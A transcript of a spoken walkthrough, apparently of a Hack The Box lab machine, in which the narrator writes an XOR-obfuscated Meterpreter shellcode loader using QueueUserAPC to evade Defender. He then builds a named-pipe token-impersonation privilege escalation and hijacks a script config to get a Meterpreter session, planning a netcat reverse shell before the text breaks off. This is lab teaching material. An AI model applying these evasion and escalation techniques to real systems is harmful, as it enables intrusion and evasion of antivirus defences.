listen on that, you do like an NTLM relay to steal the authentication and authenticate as the system user because that's who's connecting to that port. On 2019, Windows made it so you can't spoof that port. So the port's always going to be, I think, 135. And there are ways to get that working, but I'm not going to be showing that in this video. Instead, we are going to do a named pipe to have a user connect back to us on a named pipe, and then steal his token. And this is how Meterpreter GetSystem works to escalate to a system user. It used to be a lot better back in like the Windows XP days when you could force the system process to connect back to you all the time, and it was a good privesc strategy. Now it's just a privesc if you have all the tokens. So what we will do is, let's see. We have to create a C code. And the first thing we'll do is look at GetSystem. So GitHub, Metasploit payloads, and we'll see exactly how that works. So this is going to be where the video gets tough. Let's see. We'll just do cd opt, get clone. And I probably should do like a recurse to go into everything, but I don't think I have to do that to look at the code I want to look at. So this will just be quicker. So Metasploit payloads, C, Meterpreter, grep-r, GetSystem. We see GetSystem is in elevate.c. So if we look at elevate.c, GetSystem works by three things. It will do elevate technique name service pipe, name type 2, or token duplication. So let's look at elevate technique service named pipe. So grep-r, elevate technique service dot, and that's in elevate.c. So look at named pipe. Let's see. Elevate system. Named pipe. How is this working? Elevate technique. Does this not have the code I want? Let's see. Elevate.c or elevate.h. It's got to be here. Let's look at this again. Let's see. I'm looking for the call to create named pipe. Elevate technique. Okay. Elevate via service named pipe. And there's a namedpipe.h file. So it's probably namedpipe.c I want. Namedpipe.c. And this is what I want. So we can see. Let's see what it's doing. Where's create? So here we go. We're doing the call to create named pipe. And then if we go down, we're signaling to Meterpreter the pipe is ready. And then if a connection connects to us, try to impersonate, waiting for them to read a file because you don't get any of the tokens until a file is read. And now we're doing the impersonation because we got the tokens of the client process and whatnot. So you can study this code, but we're going to be writing our own. And again, this is where it gets tough. I don't know. I'm not an expert on this, so it's hard to explain. So we'll call this named pipe and go in here. And vim named pipe.c. Split this so we can put notes on the side. cd named pipe be notes.txt. So we're going to need to do a few things with this named pipe. The first thing is explain what a named pipe is. Essentially, it's just a section of memory that kind of behaves as a file that's used for inter-process communication. So a process will write to that pipe, and then the other process will be able to read from that pipe, and when it does, the pipe is normally cleared, and that's how processes talk to each other. It's essentially, think of it as files in memory. In Windows, Windows has this concept called tokens, and when a client connects to the named pipe, the owner of that named pipe has the ability to grab all the tokens of that client, and it's normally not an issue because that SE impersonate right is not given to any user. But if you have that user, you can take the token that the client gives you and become them. So that is what we're going to be doing in this code. So as notes, Windows uses camel cases for declaring the functions. I will use underscores. So that's a good way to identify what is coming out of the Windows API and what is in our code. The first thing we have to do is get the implant safely on disk. And we'll create a function called static evasion. And because of all the Patreons, we'll do a fun AV evasion with sleepx. And if you want, you can support me on Patreon, and the more people I get, the more cool things I may show. This will be fun bonus content for everyone that I think you'll enjoy. So the next thing, once we get the implant safely on disk, we will have to duplicate Meterpreter functionality for named pipe GetSystem. So that will be doing, let's see, what do we have to do? We have to use the function create named pipe. Then we need to set permissions for everyone because by default, named pipes are only accessible from administrators. If we did some more digging on the machine, we know the hacker user is not an administrator. You could just do like net groups hacker or something to do that. So we need to set the DACL and SACL so anyone can read this named pipe. Then we need read file because it's when the read file is called that we get the token. impersonate name. I think there's a thing. Impersonate NamedPipe Client. This will let us impersonate the object, and I can call this under impersonation, I guess. And then probably open thread token, duplicate token, and set thread token. These are all things that may be handy for impersonation. So I think that may be it. So the first thing we want to get started with is actually not the named pipe. We want to get the payload on disk. And we want it to work against Defender, so I'm just going to use a technique that I know. And we'll start by creating the file encrypt.c. And this mainly comes from a friend called Mumbai that did this. So let's recreate what he had done, which is just create a simple stager that XORs a payload. We could use something like GoEbola to just do this all automatically for us, but let's learn exactly how it works. So the libraries I'll need, string.h, include tl.h, just including everything I'll need to do the XOR probably. And you'll see exactly why these are used as we go through the program. So that should be everything. So we need to create the XOR function for XOR, and we'll pass it data, length, key, and key length. We don't have to pass it things like key length. We could just calculate it ourselves, but it's easier just to pass it than calculate it ourselves. So a unsigned char. So I'm just creating the declarations for each character. So now we're going to do for essentially I in 0 to the length of the key. Oh, not the key. The length of the payload. Int len right here. So we're passing it two lengths. We're passing it the length of the key and the length of our payload. And then for everything, we're going to XOR it. So A is going to be XOR'd with K. And I think that's good. So essentially what this is doing, A, and then this is going to be for every character or byte in the payload. We're going to XOR it with the key. And this is just going to, if key length is 2 and we give it 3, it'll go to the first character. So this is just doing a simple XOR there. Hopefully that all makes sense. If not, you can study it. And now we need main, int, argc, char, argv. And we will have the in file descriptor, the out file descriptor, that's input file, and output file, and char b, which will be the byte array. So if argc is less than 4, print usage / encrypt input output key. Okay. So nfd is equal to open arg v1, and that's going to be read only. And then out fd is equal to open arg v2, and that's going to be read write and create. Okay. Then if in file descriptor is not an error, which means if that file exists. If it doesn't exist, then it won't go down the statement. Do that. fstat and fd. We're getting the file size of the payload. And s. Now we're going to allocate memory for it. And assign the memory. And do the XOR. And this is going to be the length, 1, 2. And we're writing it now. That's just S. Then close everything. And that may work. So let's v test.txt. Thanks to all the Patreons. GCC encrypt.c-o encrypt. Let's see. Should get stdio there, but it still worked, I think. Encrypt test.txt, test.xor.txt. Please sub. So if we cat test.xor.txt, it looks gibberish. So we will do, if you XOR anything with twice, it will revert back to normal. So if we do encrypt test.xor.test to test.validate.text, cat test.validate.text, it looks like everything's working. So we can remove the test and we can generate our payload. So we will do MSF Venom, architecture is x64, the payload will be Windows x64, Meterpreter, bind TCP. I'm doing bind TCP, not reverse TCP, so we don't have to worry about firewalls. We need that. And then -f raw for format, and -o will be meterpreter.bin. Let this run. And I say don't have to worry about firewalls is because we already have a bypass to the firewall by setting up a proxy to access ports on localhost. So we can just listen on localhost 9001 and we'll be fine. And I actually forgot to set lhost is equal to, we'll do all zeros, lport is equal to 9001. So let this run. So now we have the Meterpreter binary. What's left is running our encrypt against it. So we can do encrypt meterpreter.bin, meterpreter.xor.bin, and now if we MD5 sum them both, we see they are different. They looked similar at first, but now they are definitely different files. if you strings meterpreter.bin, I don't know how I did that typo. That's what you get. If you do XOR.bin, you have that. So completely different looks on disk. If you do XXD on it, you can see, again, it's different. And this is just to help evade potentially any antivirus that Windows Defender may be on the box. And this evasion technique doesn't work as of like 2 or 3 weeks ago against Defender, which is why I'm showing it. It's not hard to modify it to get it working against regular Defender, but now we have to do the actual file to load this. Or no, not yet. Getting ahead of myself. We have to convert this bin file into something that we can use in a C program. So what we'll do is cat meterpreter.xor.bin and do msf venom again and specify x64, and it's Windows. The file format will be c-o payload.h. So what this is doing is converting this blob into this, which we can load in a C file. So the next thing we have to do is get this running where it will execute out of an executable. So let's do v exec.c and begin writing our executable. So define win32 lean and mean include windows.h include stdio.h include payload.h, and let's see, define encryption key please sub, define encryption key length 9, and we'll do static evasion. XOR the payload from msf venom, and we're including payload.h, which has the payload called as the file variable buf. So unsigned char. So now we're just doing that loop again. I see. That's what I want. We'll only do one line, so we don't need quotes or brackets. That should be fine. And then static void execute payload. So again, it pulls this buff out of payload.h, which we included above. So pointer old evasion virtual protect buff. This is going to assign the memory space as execute read. Because by default it would be read only. And then we're going to do a fun little AV trick. And again, normally wouldn't show this, but because we're doing the Patreon thing recently and I want to get more people, I'll show some cool tricks. OK. Int argc char. Okay, so it may look like magic, but this is actually going to execute it. So the static evasion, this is just doing the same thing we did before. We get execute payload, and we're putting something in this queue user APC. If you look at Microsoft Docs, queue user APC for the asynchronous procedural call, and if we look at sleepx, there's a bunch of functions that you can kind of chain this functionality against. So sleepx, milliseconds, and alertable. If you look at alertable, if this parameter is false and an APC is queued to the thread, the function does not return and the APC function is not executed. If alertable is set to true, this APC function, which we have here, executes. So what we're doing is putting our shellcode in the APC user function, doing the sleep, setting our alertable state to true. So when sleep finishes and it empties this queue, it will execute the shellcode in it. So this is just a way around it. If you do things like this, instead of just calling the shellcode directly, AV may not see it. So this is just one way that is detected now, but if you search around Microsoft Docs, you can probably find other ones that will execute code off that APC. So let's see if we can execute this. So we will use x86, w64, min GW32, GCC to cross compile. Code, we called it exec.c. We'll call it exec.exe. We want to link kernel 32, optimize for size, and strip it. And payload.h exists. Oh, we got to change this. We don't want that in angled brackets. We want it in quotes. And let's see, true is undeclared. We want that in caps. Stupid case sensitive things. And finally, it compiles. So let's do ifconfig eth0. I'm 10.138. So smb server.py -smb to support -user please -password subscribe pwd test. Does that work? Looks like it does. Go over to Windows 172.16.10.138/test cmd ipconfig. Okay, there we go. Please subscribe. Path does not exist. What did I give it? I gave it test. smb server.py -h for help. Share name, share path. I reversed it. There we go. Go back to the server. pkill -9. What's this Python? That's fine. Run this. Sockets in use. NetStat ALNP grep 445 kill -9 64988. There we go. Run this. Go back to it. Please subscribe. Here we go. exec.c, run it, and it immediately crashed. That is not a good sign. Desktop, exec.exe. So something is wrong. Let's make sure it's not antivirus, which I don't think it is, because I think that's disabled. Virus protection, yeah, it's disabled. So something went wrong. So let's see. Let's look at encrypt.c. History grep encrypt. Please sub. V exec.c. Let's see. Please sub. Length of 9. That looks good. Let's see. Virtual protect. Read. That should have worked. Let's do this again. So we'll do MSF Venom -p Windows Meterpreter Windows x64 Meterpreter bind TCP. Maybe I did reverse TCP. That's probably what I did. lhost is equal to all zeros. Oh, we'll just do 127.0.0.1. lport is equal to 9001-f raw-o meterpreter.bin /encrypt meterpreter.bin to meterpreter.xor.bin. Please sub. Now we need to cat meterpreter.xor.bin 64-bit payload.h. And now we can compile. Start SMB server again. Says listening. Is it really? I really gotta find a better way to kill that server. NetStat ALNP grep 445 kill -9 65823. Run this. Run. Weird. So since we already looked at generating the payload and did the execution piece, let's look at our obfuscation piece again and go through this. So taking in the file, going over each byte, and that's the mistake. It is doing an AND operation, and we want it to do the modulus. So now we can recompile, encrypt. Let's do the MD5 sum again. So that's what the MD5s are. Run encrypt. And we get a completely different MD5 sum. So that's probably it. When I said before that if our payload length is 9 and we give it a 10 and it goes back to 1, that wasn't true because we used the bitwise AND operation. We want to use the, I think it's modulus or modulo, I don't know how to say it, but that % is the correct thing, and that's probably what did it. So now we can cat this again into MSF Venom to create our payload. Windows format C output payload.h. And then once this is done, we compile. So this is exec.c -o exec.exe link kernel 32 optimize size strip. And now we can do smb server smb2 support user please password subscribe. I think it's pwd, no, test pwd. I always get those last two mixed up. So now let's go back to our dev, refresh, exec.exe, run it. It's not going away. cmd netstat -an find string 9001. It is listening. So if we do msfdb run, is this not natted? IP config. It's natted, and I don't feel like putting on bridged. But since it's listening, we assume we executed the payload. So now we can continue and move on. So we don't need that. So we can take this exec and move it into NamedPipe.c. And whoops, I don't know where my notes went. Let's get this back. Vim notes. Uh-oh. Name pipe. Vim notes.txt. Recover. Okay. So we have the code execution done. So done, done, done. So now we have to create the named pipe and do all of that stuff, which is where it'll remain hard because it's C. So let's do, and I say that kind of jokingly. Once you write the C code, it's relatively easy to read. Code by Q user ABC plus. After we do all this, we'll look at the PowerShell version that we could have used, and I think you'll agree this is much easier to read. So let's move into creating the named pipe. So let's create the function create named pipe, and we want to pass it the variable the name. So the very first thing we have to do is declare it. And then we can declare the pipe is equal to create named pipe A. And if we go to Microsoft Docs again, create named pipe A, we can see all the functions and what we have to pass to it. So we have to pass the name, the open mode, the pipe mode, max instances, buffer size, etc. So first thing is going to be the name, which is going to be pname. And then we want to pass it open mode, and that is going to be pipe access duplex. And again, if you just read these documents, you can see here's the open mode, and duplex is both inbound and outbound. We could probably do pipe access inbound to only allow read one way, but I don't feel like doing any troubleshooting, so we're just opening it all up. So the next thing we need is the mode, and we want pipe type byte, pipe wait, and pipe reject remote clients, because we're going to be doing it over localhost, so we don't need any remote clients. The next function is, what is it? Max instances, which can be 2. Max instance, and then 0. This will be out buffer size, in buffer size, and timeout. So out, in, buffer, then timeout. And I need to end on a comma. And the last thing we need is the security attributes. If we pass it null, it'll just use the default, which is going to be only owner and administrative users. We're going to want to pass it permissions for everyone. So let's Google something. GitHub, Dackle, Sackle, named pipe. We'll do create named pipe. Excuse me, sorry. Go here. I'm just looking at examples. So this is creating a Dackle that will allow everyone to have full control over a pipe. So that sounds like something we want to do. And then this is the Sackle for it that allows low integrity processes to connect to a pipe. So we can put those here. Whoops, I need set mode paste. Set, is it just mode paste? Set mode paste. Set paste. Thinking is definitely going down the drain right now. So create Dackle that will allow everyone to have access. It's doing these declarations weird. Just do printf. Failed. And let's see. That's not how we want to do them. So printf that, then we'll do 0x %x, and I think that's it. 0x %x, and that looks fine. Gonna have to do that here too. Just converting the print statements. And then the final one. Okay. That looks good. So the next function is this, initialize security attributes. And now security attributes here. So we define them. And then where does it use SA next? I think it's just and SA. Yep. go. So now it's pulling the DACL. And that's how you set DACLs and SACLs. If you want, you can look over that code. It's a huge pain compared to Linux. So named pipe has been created here. So if the pipe errors with invalid handle value, then let's do bool return value. Then bret is equal to connect named pipe p pipe null, and if bret does not equal false, return pipe. Okay. And then we can do printf named pipe 0x%x get last error. I need printf close handle else printf create named pipe A. This is just handling error codes that we could run into. Okay, so hopefully this compiles. So we can do declaring the pointer to a pipe, and then we can create the pipe. So it's equal to create named pipe argv1. So that's going to take an argument from the command line. And then after that, we can say if the pipe doesn't equal null, then we created it. And we can say printf, or someone connected to us, printf connection future impersonation here. Forgot the T. And then we can just clean up with disconnect named pipe and close it, close the handle. And that should be fine. We don't need to execute the payload right now. Let's see all the typos we made when we try to compile it. So let's compile named pipe.c to np.exe. So I have pipe type byte IC that screwed up. So let's do vim namepipe.c, and up here, byte. There we go. Fix the next one. There's a ACL header that we're missing. Trusty as well-known group is undeclared. Is it winacl.h or acl.h? Locate acl.h. Do we have a win one? Let's try just including acl.h and see if that's it. Whoops. It's definitely not it. Let's try locate acl grep.h like that. Let's see. If I put this in single quotes, will it? Oh, I see it right here. ACL API.h. That's what I want. ACL API.h. Warning. Printf. Line 80. Printf. There we go. At least it compiled. So let's just go here, name pipe, and we'll do SMB server. I'm doing this in a new pane this time, so I don't keep closing it. .py. There we go. And let's hope. I think I reversed two flags. bkill-9 SMB server, and it's test then pwd. There we go. We won't be able to just run that. Copy to the desktop. And the pipe goes like this. We probably need /. That's looking good. Whoops, did not want that PowerShell. If I do it this way, I get the profile I want. So if we do get child items with GCI, I could do spell it out, but that'll work. PowerShell can list pipes. So let's see. Do we have a pipe for IPsec? EQ mapper. I do not see one. Echo 1. All pipes instances are busy. So we got the connection. We could write to the pipe. It's weird I did not see the pipe. Whoops. Find string. This is getting annoying. Okay, so the pipe does exist. I just missed it when I looked through it. Because there's so many pipes. But IPsec is somewhere. Oh, I was looking over here at the names. I probably should look here. WinSock, WinSock2, pipe. OpenVPN. Here it is. Very last line. So we have the name pipe listening. We just need to get the impersonation now. So progress. So go back in here. Let's see. That's done. That's done. So we need all the impersonation. So let's go over, before we do impersonation, how everything worked. So this is main. It creates the name pipe server. If pipe is null, then do nothing. But if pipe isn't null, that means we get a connection in. So when we get a connection, all we do is disconnect and close. We're not doing anything. So up here in the NamedPipe create, we have us creating our DACLs and SACLs. That is just allowing us to access the pipe as a non-admin user. This NamedPipe command we went over pretty in depth. You should know what that is. So what this is doing, if pipe does not equal invalid handle, then keep going. If the pipe is invalid handle, go down here and say create NamedPipe failed and give us the error code. So if we go back to here and we ran noprob.exe with just ipsec, we get NamedPipe error code 7b. And we probably should have convert all these to integers so it's easier to read. But if you do hex 7b to, is it decimal? 123. Let's see. We can use the calculator here. Standard, programmer, is it scientific? To change in mode hex. It's probably 123. So we do common Windows error codes, and this works for like when psexec gives you a number and everything. You can just do 123. Invalid name is what this is, 0x7b. So that's how you translate the error codes. So anyways, if we give it a correct pipe, it goes down here. If the return is not false, then success, return to the main function, and keep going down the program path. If there is an error, then we'll print it. And this is when someone connects to us. Connect NamedPipe. So upon someone connecting to us, return here. And that's where this comes in. So let's do impersonation. So let's create the new function, and we'll call this static void SMB pipe impersonate. And we pass it the handle door pipe. So now we want the return declared. And the very first thing we have to do is read file. So bReturn is equal to read file hpipe, and if you Google read file and go to the Microsoft Docs, we can see everything we're going to be doing. So the handle of the file, that's going to be the named pipe. The buffer, you can read everything. So the next thing is, I said the buffer, so we'll do char star bytes 1 and dw read null. So we have to do a few declarations so this works. Char bytes, we'll say that's 5, and then dword dw read. That's fine. So in order to impersonate, we need to needs to read. So we do that, and we can say if the return is not true, we'll say, getting ahead of myself, read file 0x%x \n get last error. So that means we did not serve up a file to the client. And I'm forgetting something because that shows red. There we go. So after we read, we can now do impersonate. This is where the magic happens. So we'll do the return value again is equal to impersonate named pipe client hpipe. If the return does not equal true, I should just copy and paste these. And this will be impersonate named pipe client. Okay. So now we open the impersonated token. So b ret is equal to open thread token, get current thread. We'll say everything. And if we use false here, this is the open thread token. This will mean it'll open as a parent. So let's see, open as self, false. So you can read that, and if you don't know it as well. And we have to create our impersonation token like that. I think that's good. We have to declare them. So void iToken. And we'll do dToken impersonate. I probably spelled that wrong. Delegate 4 lines yanked. What if I can do yank W to yank word? P? Sweet. Vim shortcuts for the win. I should have done DW there. Oh well. Okay, so impersonate token is there. So the next thing we have to do is duplicate token for use in, oh, that's not delegate, this is duplicate. For use in impersonate logged on user or set thread token. This one will be started with bret yet again, and we can do duplicate token ex, the impersonation token, the maximum privileges allowed, null, duplicate token ex. Here we go. Security attributes, that's null. Impersonation level, token type, and new token. So we want to do security delegation, then token impersonation. And we want to put it in PD token. Okay. I think that's right. Copy. Put. I did 4YY to yank 4 lines. So now I will do DW to delete word. YW to yank word. We can put. And there we go. There is one thing we didn't do. And we can do to do check privilege for SE impersonate. We know we have it enabled, so I'm not checking it. Let's see. Duplicate token EX is the last thing I did. So we can just clean up with close handle, iToken, and then return a duplicated token. So maybe this compiles. Do we have typos? Handle. Okay, so everything's looking good. That compiled. We can go here and do our impersonation stuff. So let's do p iToken is equal to SMB pipe impersonate, and then pass it our pipe, and that's the function we had just created. So now we'll have to do a few more declarations. Void p token and void p iToken. Okay, let's see. Where am I? Connection, there we go. So we just ran our impersonation thing, and it returned the impersonation token. So we can disconnect, and if p iToken does not equal null, then printf executing or impersonating user it's not what I wanted. Delete this. I don't have B right here. We'll just do this. We won't have error handling here. We can add to do error handling, and we can do impersonate logged on user iToken, close out of that, and execute payload. And that may be it. If we're really lucky, that'll work. We left out a few steps like checking for a debug privilege, but we'll see if it works. lsla np.exe 1730, it compiled correctly. Let's make sure it runs. We can do a PowerShell as admin. Copy no prob into, I guess, just the root of C real quick. Don't have permission. Do I have permission to do it in program data? I do. Program data, noprob.exe, pipe, ipsec. It's running. Read file errored. Let's see. I know PowerShell handles name pipes weird. Let's try echo 1. Pipe ipsec. Duplicate token errored with 0x542. Let's see. Who am I / all? Let's see. SC impersonate. Privilege is enabled. So let's see what error this is. 542. This is taking longer than I expected. 0x542 to decimal. 1356. Do we have the error codes here? That's the wrong page. This page. Bad impersonation level. Either acquired was not provided or the provided is invalid. Huh. So I'm thinking we have to go and enable the token because maybe in the new process it doesn't start out with the enable impersonation privilege. So let's do that. The first step should be documenting what we need, and I accidentally didn't use set thread token. I did duplicate token EX, so we'll clean that up. And this is all done. But now we have to enable SE impersonate privileges. So create a function that will look up the privilege value. And this will just tell us if the privilege is there, because it may be disabled. And if it's disabled, we can enable it. If it's not there at all, it just won't even be disabled. And then we can adjust token privileges. So let's create the new function. It'll be static int enable privilege void token care se privilege. Okay. So the first thing will be to declare bool be return. So we can do a error handling how we've been doing it. And we need to create the local UID, gpriv luid, and token privileges will be g token priv. So the first thing is 0 memory for safety. And a lot of this code comes from Mumbai. He helped me a lot with this. So RTL secure 0 memory g token priv size of token privileges. Okay. So look up priv luid by ANSI name. So this will be bret. Look up privilege value. I misspelled that. PRIVILEGE. That's correct. Privilege value. The first character is, I think, null. Look up privilege value. System name. I don't want A. So here, system name, name LUID. So we'll pass it null sepriv g priv LUID if bret does not equal true, printf lookup privilege value 0x%x last error return whoops, there we go. So sepriv is the, we're going to be passing that, that'll be se impersonate name. So that should be fine. The next thing we have to do is adjust the privilege. So g token priv privilege count, and we need privileges 0. And this would be generally a lot of Googling, but thankfully I've done this before and have my own notes for doing this. Attributes se privilege enabled. So this is the token privilege structure. Then bret adjust token privileges. P token, that's what we want to modify. Then adjust token privileges. Okay. Disable all privileges. We don't want to do that, so we want to set that to false. Then we need the pointer to the token, so this will be g token priv. Then we do the buffer length. So size of token privileges, and then p token privileges null and pd word null. Okay, that's done. We can copy that, paste it, delete that word, yank that word, did not yank, yank word, put, and then if we get here without erroring, return 0. So this will be change privilege to enabled. So let's see if this works. So we have to go all the way back down to main and call that. And the very first thing we'll have to do is open a token to get the token so we can pass it into this function. So we'll do it before we even do the name pipe. So let's do open process token, get current process token all access, and put it at p token. Okay, we've already declared that, so now we can just enable privilege pp token se impersonate privilege, like that. And that may do it. Do we compile? Let's see. P token privileges undeclared. And G token priv. So let's do G. Let's see. Where are these undeclareds? G underscore token priv. And let's see. Open process token. Did you mean open? Wait, what? I'm just going to copy this and paste it because I don't see the typo. OpenProcess. Oh, I have a lowercase t. Open process token. And now we have another error. 154, P token privileges. It's probably just token privileges. So let's see. Undeclared. Let's take a closer look at this. So let's see. Error is here. And that was supposed to be P token, but this was misspelled. P token privileges. Go. And let's see. Implicit declaration of enable Windows privilege. Enable window. se impersonate name. So this one is, I think, left over from an attempt I cut out of the video and went back. Because if we look, let's see, do I still have it up? I was going off of this blog post at first. So this is, if you search, go back, GitHub Windows API impersonation, and go here. This is the first one, and this is remnants of that, so I'm just going to delete it. At least I think it is. So now we compile, and everything compiles. So we go to our box again, and let's go to our share. Let's copy noprob.exe, or NamedPipe.exe back over, and do that. Then go back here, and we still get an error on duplicate token ex. So maybe my error was not impersonation, which is very annoying. Let's go back here, make sure I did all the code. So let's see. It's going to be pipe impersonate, enable privilege. So it should be enabled. So let's see. Duplicate token ex. Something on this is probably screwed up. So let's see. Let's just try doing duplicate token. So bret is equal to duplicate token. This will be pi token security impersonation and p D token. So maybe I had screwed up the other one. Let's try this. Do I compile? I do. So go over to Windows. And let's do this. Time changed. Copy. Paste. Run it. Go here. And impersonation is just not working. Wait. Why does it still say EX? I thought I got rid of EX. Let's name this to NoProb2, NamedPipe 2. Delete it out of program data. Copy. Here. Okay. NamedPipe 2. Please work. There we go. So if I do NetStat an find string 9001, it is listening. Killed that, and it is not. So after what seems like an eternity, we have a thing that may work. It's no guarantee this is going to work. But in our test environment where we have admin, it works. So let's do app blocker bypass GitHub and go to API Cradle. And let's look at his generic app blocker bypasses. And let's do printers and this one. So we always want to try to write binaries into the Windows directory first if app blocker is enabled. And what? Let's see. This errored. Crap. Start this back up. Get connected. But as I said, if app blocker is enabled, then go for the quick win, which may be a Windows folder that you may have write access to. So let's use upload, and then we want cd NamedPipe, and we called it np2.exe. So we'll do upload root htb NamedPipe np2.exe, and we'll use the fully qualified path yet again. No, we won't, because it is gone there. Let's copy it here, paste, Control-Shift-Insert to paste with my secondary clipboard or whatever it's called. We'll call it np.exe. So now it is uploading. And when it's done uploading, we'll be able to execute it, hopefully. And even then, we're not done because we have to edit the config file. So rl wrap proxy chains ruby rl wrap proxy chains ruby this. We can execute the pipe with, I think, .\np.exe pipe. Oh my god, that was painful. Okay, util scripts. I think it's script. We'll see. It's script. Oh no, I'm going to get error messages every time because of that damn path. Let's go up one directory. dir, please don't give me error messages. Thank you. So, whoops, create a new pane. Meant to zoom in. cmd/c dir scripts. And we want type clean.ini. I need it script/clean.ini. Need a backslash. Today is just not my day. There we go. So echo main to clean.ini. And if you did this in like PowerShell or something, I'm sure there's a way to do this all in one echo, but I'm lazy. And this is easy. It just takes a while. And then let's do log file pipe. Oh my God, that was painful. And then we'll do directory next. So we can just copy this. Paste. And then we do a types on this again. And we see I made a funny mistake. Let's see if we have write access in here. We do. So I can copy clean.ini to scripts, clean.ini, and overwrite that, hopefully. Now we type it to look at it. There we go. So we have overwrote the config file. So hopefully the next time it is ran, we get a callback on our shell. So dir scripts. Let's see what the time on log file is. 10:09 and it's 18:18. So probably in another minute or so, we'll get a hit. And we could also do cmd/c netstat-in find string 9001. Because if we're listening and it's executed, we'll see it here. So we can run that again real quick. And while that runs, let's do Metasploit. So let's use exploit multi-handler. And then set payload, Windows, x64, Meterpreter, reverse TCP, show options, set lhost 127.0.0.1, set lport 9001, and set proxies to be sox5 127.0.0.1 1080. I think that's how you do that. Show advanced options. We'll see if that's how you do proxies. So let's go back here, run this again. And dir scripts, please say it's not updated. Thank you. If that script had been updated and this didn't work, I don't know what I would have done. So we'll give it a few minutes and hopefully we see this time update. And when it does, we'll run NetStat again and hopefully connect. What happens if I do run? What's my payload? We don't want reverse TCP. We want bind TCP. show options, set our host to be 127.0.0.1, all ports fine, proxies run. So I think that's fine. dir scripts 10.14. We have a thing listening. So run, and we'll see if we can connect to it. Let's see. Metasploit, use proxy, set proxies. Did I do this correctly? SOX4:. So let's do set proxies, SOX5:, like that. Maybe we didn't like the // There we go. Setting stage, Meterpreter Session 1 has been opened. So, took a long time, but we finally got there. While that loads, we can probably do decoder, PowerShell, named pipe GitHub. And if you want to do it in PowerShell, here's another way to do it without using C. Whoops, I meant to click his blog post where he explains it. So this is a good thing to read, but I like doing it the other way. Come on, give me the session. Everything going through this proxy is just so darn slow. Once this is loaded, we won't be the user yet. We'll have to impersonate as him. So if we do like get UID, you'll see we're still simple. If we load incognito, we'll get the ability to switch to different tokens. So incognito gives us list tokens. If we do it -u for username, we see no impersonation tokens available. So our script did not work because we should have impersonation token for HackBack. So something screwed up. Exit -y. That is unfortunate. So let's see. Vim NamedPipe.c did not like something. So I'm going to pause the video and take a look over the script and see what's the issue. So I think I got it. We just have to move this close handle up here. And then when we recompile it, we'll delete all the NPs and upload it. So this will be np.exe. Go over to 4, which is where we have it. Upload np.exe to, we'll do a brand new name. We'll call this lol.exe. And should only take a few seconds to upload. But while we wait for the callback next time, we'll just go over the script, and then you can copy it all down. Let's see. So upload, there's that. So what we have to do is execute it. And then while we wait to be listening on port 9001, we will go over the script. So vim NamedPipe.c. So the static evasion stuff, this is just doing the XOR, execute payload again, putting this on the APC, and then doing sleepEX. And because this is true, it's going to execute things out of the APC, the asynchronous procedural call. If this was false, then this wouldn't execute. And the reason why we did this was mainly just so it hides a little bit better, because AVs may not look for this. The downside to doing things like this is called a IOC, the indicator of compromise, or maybe not IOC, maybe that's a bad term, but it's a good way to flag attribution, because if you're doing things this funky, chances are not many people do it. So, but now that this is shown in the video, it's going to be pretty hard to attribute it. This is build DACLs. This is going to be so everyone can access our name pipe, because the user hacker or HackBack is not an administrator. This is so he can access it when he's in a low integrity process. This is just initializing everything, creating that token. It's later defined as SA. Then create named pipe. This is just going to create the pipe. This security attributes SA. This is the SACL and DACL. This is just how we handle our error handling, that bool b underscore return or ret. Then a pointer to a pipe. So we're initializing the security attributes, creating the name pipe, and then some error handling here. If the pipe wasn't created, chances are it got a invalid handle value, and this is where this prints out. And then upon connection, return. It should be pretty easy. If there's a error on connection, this is where this will print out. Enable privilege. This is just adjusting the token value so a privilege is set to enabled. We clean out a memory, get a current privilege, make sure that this is set to either disabled or enabled. As long as we have the privilege, we can change it. If we don't have the privilege at all, it won't even be disabled. It just won't be there, and then this get lookup privilege value will fail. Create the token privilege structure, set it with adjust token privileges. So this is setting it to be enabled. The key thing being right here where false is. So this sets all to enabled. So then we have the SMB pipe impersonation. This is just going to be the impersonate thing. So upon connection, we're waiting for them to read a file. When they read a file, we're going to call impersonate NamedPipe Client, and then open the thread token, which then will let us duplicate the token. And once we duplicate, then we're golden. This to do probably isn't needed, because we probably shouldn't get this far in the code if we don't have the privilege. So here, this is the main function, getting a token, setting the impersonation privilege, creating the name pipe, and then waiting for a client to connect. We got a connection. Do that impersonate function before the name pipe. This is where the duplicate token comes in. And then if the token's null, we have started impersonating, and call impersonate logged on user, then execute our payload, which is that sleep ex. So that is everything. I'll probably upload this to my Patreon and make it available for contributors of probably $10. So if you have I'll do it to any contributor. Any person that contributes, I'll make that available. So let's do NetStat. Has the person connected yet? It has. I don't know why our printfs aren't working. Maybe you have to flush standard out, but it has a new line at the end, so I don't think I have to. I think that's just a bug in WinRM, not flushing output. But let's do run. We're going to open Meterpreter stage 3, and this better work because it literally just worked when I wasn't recording. So give this probably 30, 40 seconds to send over, I think it's standard API, which is the first feature set it sends over. So it takes a while because we're going through the proxy. So we got a Meterpreter session. We can load incognito, and this will let us switch to the HackBack token. So now we do list tokens -u, and here we go. We have impersonation token available. Finally got it. So we can do impersonate token, and then because it escapes backslash, we have to do 2 backslashes. And now we are the HackBack user. Unfortunately, like, we get access denied when we do almost anything. And that is because, let's see if we can figure it out. So if we do shell, let's see, fail to spawn shell with thread impersonation, we do who am I, we're simple. So that didn't work. If we do cd backslash Windows system 32, cd Windows system 32, we can try execute -f cmd.exe -i to interact with it, and that worked. Let's do help execute. Let's see, interact, currently impersonated thread token. We want -t as well. And we get operation failed 1058. So we can go back to the Windows error codes. We'll just Google common Windows error codes. Go to this one, switch over to the 1000s, search for this, service disabled. And this is probably the IPC service or something. So, where is it? Create process as user service disabled. Let's see. Maybe this. I'm not exactly sure what process it is. I was hoping I could find it quickly, but doesn't look like I can. So if I remember, I'll put it in the descriptions of a link describing this. But as the HackBack user, we can now modify that one bat file. So if we go to cd /util scripts ls, we can download dellog.bat. And let's see, we can, where'd it save to? Find.grep dellog. Okay, saved to my working directory. Awesome. So we can just have this execute a shell. So let's see. I'm trying to think, do we want to use Meterpreter or do we want to use netcat? We'll use netcat. So, or yeah, we'll use netcat. We should have NC64 somewhere on our machine. Locate nc64.exe. So it's not on Kali. We'll just do netcat 64-bit. Windows. And then here's netcat 11. This adds something, so we'll do 1.12. Save this. Then move, downloads, netcat here, unzip it. And now we can, we probably want to go back into the app locker bypass directory. So C:, app locker bypass. I got way too many tabs open. Let's print a directory, then go here. Change this to slashes. Color. Now we can upload nc64.exe. And then we can use nc64.exe to send a reverse shell to, we'll do 9002. So delete this script, or do we want to delete it? Let's see. PowerShell. You should be nice to the people on boxes and not delete things. So we'll just put it at the very bottom. I'm not 